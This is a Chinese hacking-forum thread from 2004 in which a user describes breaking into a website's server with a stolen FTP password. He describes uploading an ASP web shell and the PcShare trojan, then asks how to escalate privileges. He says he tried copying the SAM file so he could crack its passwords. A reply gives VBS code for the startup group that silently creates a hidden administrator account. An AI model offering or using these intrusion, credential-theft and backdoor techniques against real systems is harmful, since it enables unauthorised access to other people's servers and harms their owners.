|
 | 作者: telnet3389 [telnet3389]
 论坛用户 |
登录 |
| 一不小心,得到了一个网站的FTP口令,上传了一个海阳顶端到上面,然后用它上传了PcShare服务端到c盘下面,运行成功,但是权限不够。ASP木马用的是User的权限,不能添加用户也不能写入自动运行到注册表,而且服务端能连上我的机器但是不能控制它,也得不到用户的密码。大家看看能不能有其他的办法提升权限的吗? 听说用getadmin.exe 可以,但是找了好长时间还是没有搜索到,现在的 Baidu和Google 里面好多站点都是骗人的,看了很多的下载站点,不是打不开就是下载的时候“无法找到该页”,或“该页无法显示”,郁闷!小凤居不知道有没有。在此的各位如果有的话,发一个给我,或者是告诉我地址也行。谢谢了。 还有其他可行方法吗?(修改主页没有多大的意思,只是要提升权限,有了Administator的权限就无所不能了,呵呵,当然有了Administrator的权限还是不能把那机器搬回家来的^-^ :) 相信这样的情况大家都遇到过吧,希望大家都能来讨论一下 |
| 地主 发表时间: 04-07-31 20:36 |
 | 回复: agl [agl]  论坛用户 |
登录 |
|
我说这样的问题您能不能去菜鸟乐园问去? 这儿谁会回答你呀? 那些网站不是骗人,而是你要的那个程序老的没人要了。 |
| B1层 发表时间: 04-07-31 22:09 |
| 回复: telnet3389 [telnet3389] 论坛用户 |
登录 |
|
真的是老得没有人要了吗? 可是还是选入了黑客必备的工具包里了的。 我想会有用的。 有更好的方法得提升权限? |
| B2层 发表时间: 04-07-31 23:48 |
| 回复: telnet3389 [telnet3389] 论坛用户 |
登录 |
|
大家来看看嘛 |
| B3层 发表时间: 04-08-12 20:58 |
| 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
你上传的ASP木马权限已经很高了! PcShare 能自动上线 不能控制我想和权限应该没有太大的关系! 应该是对方有防火墙拦截!所以不能达到远程控制的目的! 提升权限你可以在SERV-U上想办法! 或者SQL 上想办法!! 比如 SERV-U SQL的扩展命令 |
| B4层 发表时间: 04-08-13 08:53 |
 | 回复: bluecat_ [bluecat_]  论坛用户 |
登录 |
老木马和老的病毒好像现在最新的杀毒软件都杀不了呀.... |
| B5层 发表时间: 04-08-16 00:36 |
| 回复: telnet3389 [telnet3389] 论坛用户 |
登录 |
|
这个服务器我用asp木马运行 黑洞 成功了,但只能查看机器里面的文件,不能下载和上传 pcshare没有成功 winshell连接成功,但是没有权限,没有办法加帐号 大家说能不能用asp木马copy它的sam到ftp目录,再下载到本地,在破解? 我试了,可以下载repair下面的那个sam,但是不能下载config下面的那个 可以repair下的那个好象没有什么用的,大小都是20k,不信你看看自己的那个。 现在就是为提升权限伤脑筋,在asp下的木马没有什么权限 它用的是MS的ftp,Serv-U益处行不通 |
| B6层 发表时间: 04-09-19 13:14 |
 | 回复: guzhu [guzhu] 论坛用户 |
登录 |
|
http://www.20cn.net/cgi-bin/club/show.pl?key=nbEhNRukhfou&cat=security&forum=newbie&id=1094973401&page=1 |
| B7层 发表时间: 04-09-19 14:29 |
| 回复: guzhu [guzhu] 论坛用户 |
登录 |
|
我记得repair下的sam也是纪录同种东西的! |
| B8层 发表时间: 04-09-19 14:31 |
| 回复: yuwy [yuwy]  论坛用户 |
登录 |
|
看来看去不东 还是看了看来 |
| B9层 发表时间: 04-09-22 16:41 |
| 回复: telnet3389 [telnet3389] 论坛用户 |
登录 |
|
回复: 孤竹 [guzhu] 论坛用户 回复 收藏
http://www.20cn.net/cgi-bin/club/show.pl?key=nbEhNRukhfou&cat=security&forum=newbie&id=1094973401&page=1 感谢 孤竹 兄弟,你发的贴我看了,里面有些方法是可行的 谢了 repair下的那个sam好象没有多大的用,我copy下来了但是用LC破不开 我在我的机器上面建了一个空口令的管理员帐号,然后再用LC破解那个repair下的sam也同样不行,绝对不是我不会用LC.这是为什么呢?那个repair下的sam好象是备用的吧,所以与当前的管理员帐号密码不一样. config下的那个sam在机器正常工作下又是无法Copy过来破解,能有什么方法那到config下的那个sam ? |
| B10层 发表时间: 04-09-23 09:56 |
| 回复: tiancaiyt [tiancaiyt]  论坛用户 |
登录 |
|
写个vbs文件 放到启动组 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user tiancaiyt xxxx /add",0) b=wshshell.run ("cmd.exe /c net localgroup administrators tiancaiyt /add",0) |
| B11层 发表时间: 04-09-23 21:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 关于“海阳顶端木马”入侵